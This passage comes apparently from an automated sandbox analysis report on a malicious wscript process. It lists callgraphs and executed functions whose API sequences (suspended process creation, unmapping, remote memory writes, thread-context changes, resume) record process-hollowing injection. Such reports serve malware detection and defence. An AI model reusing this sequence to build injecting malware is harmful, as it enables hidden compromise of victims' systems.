5e3019b 1959->1960 1961 5e301b8 VirtualAllocEx 1960->1961 1962 5e301d2 1961->1962 1963 5e30214 WriteProcessMemory 1962->1963 1964 5e30220 1963->1964 1965 5e302fa WriteProcessMemory 1964->1965 1966 5e3031e 1964->1966 1965->1964 1967 5e3034f Wow64GetThreadContext 1966->1967 1968 5e3035e 1967->1968 1969 5e3039e WriteProcessMemory 1968->1969 1970 5e303aa 1969->1970 1971 5e303e5 Wow64SetThreadContext 1970->1971 1972 5e303f5 1971->1972 1973 5e30407 ResumeThread 1972->1973 1974 5e30415 1973->1974

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_06230420 18 Function_06230450 0->18 25 Function_06230419 0->25 1 Function_05E30420 19 Function_05E30450 1->19 26 Function_05E30419 1->26 2 Function_05660420 21 Function_05660450 2->21 28 Function_05660419 2->28 3 Function_05EC04AB 4 Function_062304AB 5 Function_05E304AB 6 Function_05EC0420 20 Function_05EC0419 6->20 27 Function_05EC0450 6->27 7 Function_056604AB 8 Function_05660477 9 Function_06230477 10 Function_05E30477 11 Function_05EC0477 12 Function_05E3003C 12->1 12->19 12->26 13 Function_06230000 13->0 13->18 22 Function_06230054 13->22 13->25 14 Function_05E30000 14->1 14->19 23 Function_05E30054 14->23 14->26 15 Function_05660000 15->2 17 Function_05660054 15->17 15->21 15->28 16 Function_05EC0000 16->6 16->20 24 Function_05EC0054 16->24 16->27 17->2 17->21 17->28 18->4 18->9 19->5 19->10 21->7 21->8 22->0 22->18 22->25 23->1 23->19 23->26 24->6 24->20 24->27 27->3 27->11

                                    Executed Functions

                                    Function 05660000 Relevance: 13.9, APIs: 9, Instructions: 367threadinjectionmemoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05660054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05660167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05660192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 056601C9
                                    • WriteProcessMemory.KERNELBASE ref: 05660217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 056602FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05660355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 056603A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 056603EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0566040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2085714208.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5660000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
                                    • String ID:
                                    • API String ID: 2814188497-0
                                    • Opcode ID: 6c37c85a84e8279a60677376c82f02b3acf0ed10cbc80a7cd826076a0d8c9380
                                    • Instruction ID: ff2db664d8f925388ba3bea4533d2867b54223a2cee2628bc5844f6780834d4c
                                    • Opcode Fuzzy Hash: 6c37c85a84e8279a60677376c82f02b3acf0ed10cbc80a7cd826076a0d8c9380
                                    • Instruction Fuzzy Hash: A5C10A75784244FFE62667B08C1EF293B25DF46728F1482FDE2005F1E2C9A36821C76A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 06230000 Relevance: 13.9, APIs: 9, Instructions: 360threadinjectionmemoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 06230054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 06230167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 06230192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 062301C9
                                    • WriteProcessMemory.KERNELBASE ref: 06230217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 062302FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 06230355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 062303A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 062303EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0623040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086265962.0000000006230000.00000040.00001000.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6230000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
                                    • String ID:
                                    • API String ID: 2814188497-0
                                    • Opcode ID: 58c361fb1c5f3ea61c1f4ade8baf3aac4c4ad1124d0c6c02bf002179588a08bb
                                    • Instruction ID: 69484e00ec0bb580ee1d24925d311dd7da2318bcc3ecaeebe3ba7d6ef876833a
                                    • Opcode Fuzzy Hash: 58c361fb1c5f3ea61c1f4ade8baf3aac4c4ad1124d0c6c02bf002179588a08bb
                                    • Instruction Fuzzy Hash: 04C120B42A0254BFE6D977F0CC02F2937259F56708F1440A9EB616F1D1CBA29E12C772
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05EC0000 Relevance: 13.9, APIs: 9, Instructions: 356threadinjectionmemoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05EC0054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05EC0167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05EC0192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 05EC01C9
                                    • WriteProcessMemory.KERNELBASE ref: 05EC0217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 05EC02FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05EC0355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05EC03A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 05EC03EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 05EC040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086080945.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5ec0000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$ContextWow64$AllocCreateResumeSectionUnmapViewVirtual
                                    • String ID:
                                    • API String ID: 2814188497-0
                                    • Opcode ID: 042cc396625a3de1e1ea30ef02463d81bfc26d4ecd8002fd453107bc9edaa789
                                    • Instruction ID: 189fa3a83f4efe9bbac18edc106125c833674b78ffe2567ec7682e79b436bb8e
                                    • Opcode Fuzzy Hash: 042cc396625a3de1e1ea30ef02463d81bfc26d4ecd8002fd453107bc9edaa789
                                    • Instruction Fuzzy Hash: 91C1FD75790244FFE61577B19D4EF2E3B25BF46708F1490EDF2806F1D2C9A2A8128662
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05E30000 Relevance: 13.9, APIs: 9, Instructions: 351memorynativeinjectionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05E30054: CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05E30167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05E30192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 05E301C9
                                    • WriteProcessMemory.KERNELBASE ref: 05E30217
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086042644.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5e30000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$AllocCreateMemorySectionUnmapViewVirtualWrite
                                    • String ID:
                                    • API String ID: 1599469609-0
                                    • Opcode ID: b190c6a758137c1d7ea5d11a36c2aa9f4efeb2f819fbe902bbe22a0fb9214416
                                    • Instruction ID: 9224222a5aaf46d24b40c735f227a11d15e553e2d1beac5b2f6af7dd3be2670b
                                    • Opcode Fuzzy Hash: b190c6a758137c1d7ea5d11a36c2aa9f4efeb2f819fbe902bbe22a0fb9214416
                                    • Instruction Fuzzy Hash: 9DB12D75790204BFE71977F1DC0FF2937259F86B08F1090A9E2816F1E1C9A2AA21C662
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05E3003C Relevance: 13.8, APIs: 9, Instructions: 332threadinjectionprocessCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05E30420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05E30083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05E3043F
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05E30167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05E30192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 05E301C9
                                    • WriteProcessMemory.KERNELBASE ref: 05E30217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 05E302FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05E30355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05E303A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 05E303EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 05E3040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086042644.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5e30000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                                    • String ID:
                                    • API String ID: 4009322845-0
                                    • Opcode ID: 5be675c49af8cc823581b7f01f74d48a4ed046ce3aaf9cce9a0cda4282e32c8d
                                    • Instruction ID: ffeb67ec9c09f2d767d72367c481024b2f2616faa527bd50bd9b6e719c2b6875
                                    • Opcode Fuzzy Hash: 5be675c49af8cc823581b7f01f74d48a4ed046ce3aaf9cce9a0cda4282e32c8d
                                    • Instruction Fuzzy Hash: 16B1DB74790204BFE7197BF1DC4FF2937259F85B0CF209169E2816F1E1C9A2AE21D662
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 06230054 Relevance: 13.8, APIs: 9, Instructions: 322threadinjectionprocessCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 06230420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,06230083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0623043F
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 06230167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 06230192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 062301C9
                                    • WriteProcessMemory.KERNELBASE ref: 06230217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 062302FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 06230355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 062303A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 062303EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0623040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086265962.0000000006230000.00000040.00001000.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6230000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                                    • String ID:
                                    • API String ID: 4009322845-0
                                    • Opcode ID: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction ID: 11fdcece369593e91b84d7ca13311a0e88e49b83da9ba17dc1a1c522e6d9a74f
                                    • Opcode Fuzzy Hash: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction Fuzzy Hash: ADA1E1B47A0214BFE5D877F1DC46F2936159FA5B0CF204068EB217F1D1CBA29E228671
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05660054 Relevance: 13.8, APIs: 9, Instructions: 322threadinjectionprocessCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05660420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05660083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0566043F
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05660167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05660192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 056601C9
                                    • WriteProcessMemory.KERNELBASE ref: 05660217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 056602FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05660355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 056603A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 056603EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 0566040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2085714208.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5660000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                                    • String ID:
                                    • API String ID: 4009322845-0
                                    • Opcode ID: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction ID: e9cae28b5a30c1c018b5fc401d6d8dbeaee8ec28efe782272bf25a0efd3dbe41
                                    • Opcode Fuzzy Hash: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction Fuzzy Hash: A5A1B674790204FEE6257BF19C4EF393615DF85B2CF2082BCE2006E1E1C9A36921D66A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05EC0054 Relevance: 13.8, APIs: 9, Instructions: 322threadinjectionprocessCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05EC0420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05EC0083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05EC043F
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05EC0167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05EC0192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 05EC01C9
                                    • WriteProcessMemory.KERNELBASE ref: 05EC0217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 05EC02FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05EC0355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05EC03A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 05EC03EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 05EC040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086080945.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5ec0000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                                    • String ID:
                                    • API String ID: 4009322845-0
                                    • Opcode ID: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction ID: 5d9c358ca0b2bfeea1b0df9934372ffec6488a4c4450c2485d589a6339ce0a9a
                                    • Opcode Fuzzy Hash: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction Fuzzy Hash: 88A1BA74790204FFE51577F1DE4EF2E3A15BF85B08F2091ECF2806E1D1C9A2E9229661
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05E30054 Relevance: 13.8, APIs: 9, Instructions: 322threadinjectionprocessCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 05E30420: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05E30083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05E3043F
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000042,0000002A,0000002E,?,16B3FE88,00000000), ref: 05E30167
                                    • NtUnmapViewOfSection.NTDLL(?,?,0000002E,00000022,?,F21037D0,00000012,?,00000000,00000000,00000000,00000000,00000004,00000000,00000000), ref: 05E30192
                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,0000002E,00000022,?,6E1A959C,00000000,?,?,0000002E,00000022,?,F21037D0), ref: 05E301C9
                                    • WriteProcessMemory.KERNELBASE ref: 05E30217
                                    • WriteProcessMemory.KERNELBASE(00000026,0000003E,00000026,?,CF14E85B,00000012), ref: 05E302FD
                                    • Wow64GetThreadContext.KERNEL32(?,?,0000002E,00000032,?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05E30355
                                    • WriteProcessMemory.KERNELBASE(?,68A7C7D2,00000000,00000032,0000003A,00000036,?,CF14E85B,00000012), ref: 05E303A1
                                    • Wow64SetThreadContext.KERNEL32(?,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000,00000032,0000003A,00000036), ref: 05E303EC
                                    • ResumeThread.KERNELBASE(?,0000002E,?,9E4A3F88,00000000,?,0000002E,00000032,?,E8A7C7D3,00000000,00000032,00000022,?,68A7C7D2,00000000), ref: 05E3040C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086042644.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5e30000_wscript.jbxd
                                    Similarity
                                    • API ID: Process$MemoryThreadWrite$AllocContextVirtualWow64$CreateResumeSectionUnmapView
                                    • String ID:
                                    • API String ID: 4009322845-0
                                    • Opcode ID: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction ID: 011d27a7112ed563682538ff5845c6a691bb029f07a209487331f62b9f34deb0
                                    • Opcode Fuzzy Hash: abefd893c78f63ec501357fb14bf61d80a739cae84c00b71e3bd370fcc70d613
                                    • Instruction Fuzzy Hash: 4DA1ED74790204BFE7197BF1DC4FF2936259F85B0CF209168F2816F1E1C9A2AE21D662
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 06230420 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,06230083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0623043F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086265962.0000000006230000.00000040.00001000.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_6230000_wscript.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction ID: a06728400f94ca52a07964d2614275fbf02745d18abaa8cf9fe0ac662e47e194
                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction Fuzzy Hash: 72D022F01A43107AF2C17BB14C02F0C3680AF50B09F400814FB24380E0C7BADE1A0276
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05660420 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05660083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 0566043F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2085714208.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5660000_wscript.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction ID: 63ab40e9905fb0ab4bf378d0adc0055a479642ce29fc72c56d4d8641510ddff4
                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction Fuzzy Hash: 2ED02274384300FAF2227BB14C0AF283680EF40B19F4009BCF304380E0C5BB9828825E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05EC0420 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05EC0083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05EC043F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086080945.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05EC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5ec0000_wscript.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction ID: eaa483d508e10c58486a442ff331fe9f522194381a56efd9f707ebf13d428032
                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction Fuzzy Hash: 48D02270384300FAF2017BB14D0AF0E3E80BF40B0AF4018DCF384380E0C5BAD81A0256
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05E30420 Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,05E30083,0000003C,0000001E,0000004A,0000003E,00000042), ref: 05E3043F
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.2086042644.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_5e30000_wscript.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction ID: 6837da2436a0fd904e283ee052a2a732f6a597893b416b7e868d8f4490504c31
                                    • Opcode Fuzzy Hash: 06eb02c548db0a05d1e20e56bead04f6bc1efedc2ff2b69c3f0a506310807bbb
                                    • Instruction Fuzzy Hash: BBD022703843007AF3017BB14C0FF083690AF40B09F401814F384380E0C5BADA188256
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    Function 051A9F5D Relevance: 2.2, Strings: 1, Instructions: 968COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000003.2049742150.00000000051A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 051A9000, based on PE: false
